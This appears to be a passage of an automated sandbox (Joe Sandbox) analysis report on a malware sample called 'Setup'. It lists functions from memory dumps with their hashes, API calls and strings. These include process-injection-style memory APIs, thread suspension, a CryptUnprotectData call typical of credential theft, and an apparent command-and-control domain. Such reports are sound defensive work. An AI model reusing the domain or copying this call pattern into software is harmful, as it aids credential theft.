L, xrefs: 03205916
J, xrefs: 03205808
K, xrefs: 03205709
K, xrefs: 0320591B
K, xrefs: 03205803
I, xrefs: 03205713
J, xrefs: 03205920
J, xrefs: 0320570E
I, xrefs: 0320580D

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: I$I$I$J$J$J$K$K$K$L$L$L
API String ID: 0-2736399220
Opcode ID: b1b22cf654b134ef16cdd56b5f66bb212436b92450449bfeb77da604b6d72451
Instruction ID: 862e8a3f0d63380a0ba4132cd04ebece495bd1447ec103ea441c3a1918afc9f2
Opcode Fuzzy Hash: b1b22cf654b134ef16cdd56b5f66bb212436b92450449bfeb77da604b6d72451
Instruction Fuzzy Hash: 4CA1497252C3848FD304CA28C49432EBBD29BD6314F2D8A6DE4D6873C7D678C9898B57

Function 00FCBF6F Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00FCC008
NtMapViewOfSection.NTDLL(?,00000000), ref: 00FCC0B0
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FCC424
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00FCC4D9
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00FCC4F6
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00FCC599
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00FCC5CC
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00FCC73D

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: c54b6a4801776f32b4220ac501269dbf555d88cc5be3586a8b3b5f4816c33089
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: ED426A72A083029FDB24CF64CD46F6AB7E8EF88710F18492DF9899B241D734E845DB91

Function 031FB124 Relevance: 11.5, APIs: 2, Strings: 4, Instructions: 976
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[, xrefs: 031FBBFE
{fby, xrefs: 031FB810
>XV{, xrefs: 031FB462
J, xrefs: 031FB8EC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: >XV{$J$[${fby
API String ID: 0-3606238112
Opcode ID: 4c19b9c70ebaf6886f6bf264686a7dd2a69399a33f84f9f16f65a73a900c107e
Instruction ID: b1ea2cac1e630067ce9d01e25a343cda62bec483f528c081b1acb9962cc0b3b9
Opcode Fuzzy Hash: 4c19b9c70ebaf6886f6bf264686a7dd2a69399a33f84f9f16f65a73a900c107e
Instruction Fuzzy Hash: F452E42160C3918FD725CB29C4507ABBBD29FDB244F0DC9ADD5C99B396C739840AC7A2

Function 031DDBDB Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 031DDBF0

Strings

9n`, xrefs: 031DDE30
Z&\, xrefs: 031DDEA9
4, xrefs: 031DDC05
RT, xrefs: 031DDEBF
moanungsnake.click, xrefs: 031DDFFE

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: Uninitialize
String ID: 4$9n`$moanungsnake.click$RT$Z&\
API String ID: 3861434553-2593002711
Opcode ID: a02ff55da3751366efbcc8e36b04cc8ddffe0cb63582051a893ee5d27a0edc77
Instruction ID: 2269d0dffe98b28c52bd64ed0f833f7590c49af7f9c209b52721d59c148438c4
Opcode Fuzzy Hash: a02ff55da3751366efbcc8e36b04cc8ddffe0cb63582051a893ee5d27a0edc77
Instruction Fuzzy Hash: E9A1E0715083D08BD736CF2994A17EBBFE1AFAB304F18499CC0C99B246D7354105CB92

Function 031D84B0 Relevance: 7.7, APIs: 5, Instructions: 237
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 031D84D4
GetCurrentThreadId.KERNEL32 ref: 031D84DE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 031D8698
GetForegroundWindow.USER32 ref: 031D86AD
RtlExitUserThread.NTDLL(00000000), ref: 031D8771

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: CurrentThread$ExitFolderForegroundPathProcessSpecialUserWindow
String ID:
API String ID: 2442286830-0
Opcode ID: dcb6fe3a59d31589ff48e2fcbda8e363b654b30132b9a98a4886673cd78f99e3
Instruction ID: ff8422784414dfb2f24f536d82f324247db957ec88f35cea20aeab09910f6c7a
Opcode Fuzzy Hash: dcb6fe3a59d31589ff48e2fcbda8e363b654b30132b9a98a4886673cd78f99e3
Instruction Fuzzy Hash: E8615877F5571C4BC718AEA9DD86359F6CB5BD8710F0E843DAA84CB395EEB88C094280

Function 031FBCB4 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 031FBE10

Strings

WZ8j, xrefs: 031FBE77
7, xrefs: 031FBCCA
EIlR, xrefs: 031FBCE0

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 7$EIlR$WZ8j
API String ID: 3960555810-984579390
Opcode ID: 17d8a61df8cd73acb4f3907efe111ac2754703e4bc207fc39d837d35a4c257c4
Instruction ID: 082f844e23e44863ab6a26f81ccec521451e7ddc6fdce857755652ba1db96d23
Opcode Fuzzy Hash: 17d8a61df8cd73acb4f3907efe111ac2754703e4bc207fc39d837d35a4c257c4
Instruction Fuzzy Hash: 74C1F37160C3918FD729CF29C4607ABBBD1AFD7304F1889ADC4D99B282DB39450ACB52

Function 031DE2D1 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 031DE47B
rg, xrefs: 031DE343
!%, xrefs: 031DE2D3
%V, xrefs: 031DE470
B, xrefs: 031DE2DD

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: !%$%V$B$X$rg
API String ID: 0-1800674655
Opcode ID: a46230692e698a340f84f7df7d630feb9a23688ce13628c5f74e526128f3f1f4
Instruction ID: 139e7a645ef492a2aa31a63e2d4054ce5acd75a719462fa9ffa813a6993a69cd
Opcode Fuzzy Hash: a46230692e698a340f84f7df7d630feb9a23688ce13628c5f74e526128f3f1f4
Instruction Fuzzy Hash: 0E5118756083404BD7298A3898527EFABE2EBDB314F1C5A7CD0C99B293E7384416875A

Function 00F80ABF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00F80605,?,00000001,?,81EC8B55,000000FF), ref: 00F80AFD
Thread32First.KERNEL32(00000000,0000001C), ref: 00F80B29
Wow64SuspendThread.KERNEL32(00000000), ref: 00F80B7C
CloseHandle.KERNEL32(00000000), ref: 00F80BA6

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: aaf5782a9681df6f9bb8f09e867b28997bf5d2714be5012e82380b9c39f4f0ac
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: EE410871A00108AFDB58DF98C891BADB7B6EFC8310F508168E615DB7A4DA34EE45CB94

Function 031E1D90 Relevance: 5.7, APIs: 1, Strings: 1, Instructions: 2207COMMON

Download Yara Rule

Strings

`, xrefs: 031E2ABB

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 97c2700bba3ec01568a7a3c4b526e8c034c87495c8ed8361d25c64e85ea2f71a
Instruction ID: 6a936d76fdd63a64d2ef42fd9cd4f2b566c25283168b2c3c8b5a9f45a36dda6b
Opcode Fuzzy Hash: 97c2700bba3ec01568a7a3c4b526e8c034c87495c8ed8361d25c64e85ea2f71a
Instruction Fuzzy Hash: B013F275608B808FD324DF38C954756BFE1AB9A310F098AACD4EA8B3D2D736E445C752

Function 031DE2A4 Relevance: 3.9, Strings: 3, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 031DE47B
rg, xrefs: 031DE343
%V, xrefs: 031DE470

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: %V$X$rg
API String ID: 0-21410605
Opcode ID: 4b9a9cae9492d07b9cdf1f68fc6d9404e1c881c9519cd5b6044210e29b545007
Instruction ID: 8c5c243329ac479318df9622d484cf0831ad1cc530303efc4dbc26975a95c794
Opcode Fuzzy Hash: 4b9a9cae9492d07b9cdf1f68fc6d9404e1c881c9519cd5b6044210e29b545007
Instruction Fuzzy Hash: A15117756083804BC729CA3898627EFBBE2EBDB314F1C4A7DC0D58B293E77844168756

Function 031DE2A0 Relevance: 3.9, Strings: 3, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 031DE47B
rg, xrefs: 031DE343
%V, xrefs: 031DE470

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: %V$X$rg
API String ID: 0-21410605
Opcode ID: 2873805b98e17369494afca9eb883247447c9b55471c44850a78c2da0a2abd5f
Instruction ID: ba598b154d3e292d5198469b6a79067b4a521d4473b6897babb21100dfef0d7f
Opcode Fuzzy Hash: 2873805b98e17369494afca9eb883247447c9b55471c44850a78c2da0a2abd5f
Instruction Fuzzy Hash: 085125766083404BC7288A3898527EFBBE2EBDB314F1C5A7CD0D99B292E73844168756

Function 031FA497 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 031FBE10

Strings

WZ8j, xrefs: 031FBE77

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: WZ8j
API String ID: 3960555810-2890758108
Opcode ID: 434eeeb176c9885290645c5e24bdb98beb53a1f848b5e773f66be95166a5929a
Instruction ID: c23f3824dddcadda2b1488782e9dfd4001ae699cf7b308944255cc3a7f068b2b
Opcode Fuzzy Hash: 434eeeb176c9885290645c5e24bdb98beb53a1f848b5e773f66be95166a5929a
Instruction Fuzzy Hash: 87A1F37160C3908FD729CF29D4607ABBBE1AFDB304F1889ADD4C99B282DB354406CB52

Function 00F8096F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00F80A3B

Strings

,, xrefs: 00F80A87

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 16ee005551e90f3ab54e35d461d2c4888ba1a697c5fe60c4c05faa482ee0598e
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: FE41C374E00209EFDB08DF98C994BAEB7B1BF88314F208198D515AB391C775AE85DB94

Function 0320D430 Relevance: 2.9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

Strings

:, xrefs: 0320D60D
*+,-, xrefs: 0320D4D7

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID: :$*+,-
API String ID: 2994545307-2599365846
Opcode ID: 474a8ef8c393f6f487098c22e3c2b4e6ae0eb933798760bee2da9ae2e1e2ef69
Instruction ID: 88021ba947c8de12bd16fff9439bb0cb667a8a675bf4b5edf0aa594bb05ba6a4
Opcode Fuzzy Hash: 474a8ef8c393f6f487098c22e3c2b4e6ae0eb933798760bee2da9ae2e1e2ef69
Instruction Fuzzy Hash: 10B164356193414BC725CF68D8C197BFBE2EBDA214F0CC96CE8C587396DA34D8898792

Function 00F803AF Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00F80652

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 73cfb65d7c0f2097325610db4ae0246d26e8b1e4c2d31798145313afa67acc33
Instruction ID: 156d38c8093aa44a7069c02f92db8834feebb3af412da81f8a22d2aacfb5e1a5
Opcode Fuzzy Hash: 73cfb65d7c0f2097325610db4ae0246d26e8b1e4c2d31798145313afa67acc33
Instruction Fuzzy Hash: AC12D1B1E00219DBDB14DF98C990BEDBBB2FF88304F6482A9D515AB381CB346A45DF54

Function 031E8438 Relevance: 1.7, APIs: 1, Instructions: 169encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 031E8621

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: ded4d4d16631d9e8af7942d21728af9b0724bf63be55da85bd3ac8b6348bd885
Instruction ID: 169ea659dd0f147d5ea7a128119bd9fc7f01b220eb4ecc5d6bd3d6e468a4addc
Opcode Fuzzy Hash: ded4d4d16631d9e8af7942d21728af9b0724bf63be55da85bd3ac8b6348bd885
Instruction Fuzzy Hash: E35115B2A087404FC729DF28C8913BABBE2EB99304F18496DE4D5C7282E735D805CB52

Function 031F5280 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

LKJI, xrefs: 031F52A5

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID: LKJI
API String ID: 2994545307-2313094147
Opcode ID: 12edec974a23c10f20b22a0ed1db8e3aebc6c5060a5c896256a15fa9dc6834ba
Instruction ID: ba23c98b61f41f21795d58ed28a4067788503918d3fd18187ec9c7caaba2b102
Opcode Fuzzy Hash: 12edec974a23c10f20b22a0ed1db8e3aebc6c5060a5c896256a15fa9dc6834ba
Instruction Fuzzy Hash: 47919A72B147104FD714DE2ADC8262BB7E3EBDA314F5D853CEA464B285F778980A8391

Function 0320A0F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0320C30B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0320A11E

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0320C6F0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

$#"!, xrefs: 0320C721

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID: $#"!
API String ID: 2994545307-3754183090
Opcode ID: 5181ddd57bd398f194cd7c11621e43ce0f0a9a11259fa9ecd9ffc9f5df91c8b2
Instruction ID: 8b319a9ce93e8e566da2211ab8b6c7c97220ed7b2315ca60256a5835385b3e90
Opcode Fuzzy Hash: 5181ddd57bd398f194cd7c11621e43ce0f0a9a11259fa9ecd9ffc9f5df91c8b2
Instruction Fuzzy Hash: D6317BB52283155BE724DE20ECC1B7BB396FB84710F28872CE6805B2D6D771AC888785

Function 0320C9A0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

@, xrefs: 0320CA09

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 790dfd79189aca88bc68759db63a2f9f2df6bd888da1b60af5a9d6ba07b22dbf
Instruction ID: e8f48c8188b4ef5e20d10a5b43224620c67057f9b89efef30759ad54daed21b7
Opcode Fuzzy Hash: 790dfd79189aca88bc68759db63a2f9f2df6bd888da1b60af5a9d6ba07b22dbf
Instruction Fuzzy Hash: B33122B26183058BC324DF18D4C166FB7F5FFD5314F098A2DE6859B292E7319888CB92

Function 0320CAC0 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07b82341ea19b6f2611c10f00e0d5079ceb9bbcba2bb28378c468015d962eaff
Instruction ID: 84391d5e345afa86a41e4203bb54bd06eacb99fe9ff02928668daad8e8b49d6f
Opcode Fuzzy Hash: 07b82341ea19b6f2611c10f00e0d5079ceb9bbcba2bb28378c468015d962eaff
Instruction Fuzzy Hash: F3618A756143129BC724EF18D890A7FB7A2FFD5750F09866CE8858F296EB30D885C781

Function 03208800 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec124fa422948e0806b4ad41c9613176482c09024fbae4eb86aa99c7684d12e6
Instruction ID: b5ea4f2ad789669522e3f412e3c3936bfac0db2f3521305802d8282e20422703
Opcode Fuzzy Hash: ec124fa422948e0806b4ad41c9613176482c09024fbae4eb86aa99c7684d12e6
Instruction Fuzzy Hash: 0B61AC32A147048BD728DA28D84173BF392EBD1B14F2D866CD5C5AB3C7EA319C4A8785

Function 031DC433 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b026eaaea2b1377ef70280157de0742160eb0ca57159a8571f5c12f30eebbfbf
Instruction ID: f439b03d001dbeed2a7614ce2f31e89ec963558ace5f0cb75c2dcff71ef89e7c
Opcode Fuzzy Hash: b026eaaea2b1377ef70280157de0742160eb0ca57159a8571f5c12f30eebbfbf
Instruction Fuzzy Hash: 3E4121742583418FC718DFA4E89056BB7F2EFD9304F08C92CE59AC7291EB349605CB06

Function 00FCCBED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 00FCCC7F

Strings

.dll, xrefs: 00FCCC24

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: 044ee2075845753cbb81b219e74a8d6ba240ba8aa8ae913173a22eeefb0ac80b
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: C421E472A042C69FE721CFADC985FAE7BA4AF01760F19416DD80E9BA41D730EC4597C0

Function 0320A249 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0320A334

Strings

eXYZ, xrefs: 0320A260

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: ForegroundWindow
String ID: eXYZ
API String ID: 2020703349-2949970386
Opcode ID: 18cbe4846271ca6cc8a953b1574fdb65643bd7f70d1c16592507fa2d6fff2052
Instruction ID: 530861421bbdde1a8f63f189dd71438d8b67dd871b73b3ca46345b66147cf6c3
Opcode Fuzzy Hash: 18cbe4846271ca6cc8a953b1574fdb65643bd7f70d1c16592507fa2d6fff2052
Instruction Fuzzy Hash: 7A012B77E282104BC70CDB24DC689AABBE2FFD5204749C56CC946CB746EB3A9C54C681

Function 031DC788 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 031DC79A
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 031DC7B2

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 97503edf2b989f3d08117d5dbbc2240d174cda45b1c7f2c049d8e15ae7e380b6
Instruction ID: 33aa19f16fd35ae8c77bc85301d16766af6fa128d38a24f06a6be26e29bb7302
Opcode Fuzzy Hash: 97503edf2b989f3d08117d5dbbc2240d174cda45b1c7f2c049d8e15ae7e380b6
Instruction Fuzzy Hash: 1EE042343C83017AF675A654AD1BF153255A755F26F348304B7363D6D9D9E03215860C

Function 031FC347 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 031FC43E

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b123887515220683dd1679f0791b7aeb5fc4bc78d0b6c575ec99ae2b06e75c30
Instruction ID: c92a254e23024936cd8d97e0346306378d5c08c140a315cd1f2fc54bf927b440
Opcode Fuzzy Hash: b123887515220683dd1679f0791b7aeb5fc4bc78d0b6c575ec99ae2b06e75c30
Instruction Fuzzy Hash: 1D21D3605083D18EC735CB1498607ABBBE1DF97309F08499DC6C9A7282CB39050ADB53

Function 00FCB83F Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FCB8B9

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: 362377734246e49d881d48173de0da47a885710b47b79b50cca75c4d2f065519
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 4FB10336900607ABDB219E60CE83FA7B7E8FF45320F14052DF99982151E735E950EBA1

Function 031FD536 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 031FD584

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: efc27ed5cdf96900167fa2e71362bbe7cce3ec2b39320ff311dd992243850ff2
Instruction ID: 1661f40d12ff85a7665dfd312799b914d97d6afa1abe7280bf3007bc95a1c71e
Opcode Fuzzy Hash: efc27ed5cdf96900167fa2e71362bbe7cce3ec2b39320ff311dd992243850ff2
Instruction Fuzzy Hash: 7BF0E2B52097028FE300DF25D15874BBBE2BB88314F25C91CD4A44B344C7B6AA4A8FC2

Function 031FF96B Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 031FF9B2

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
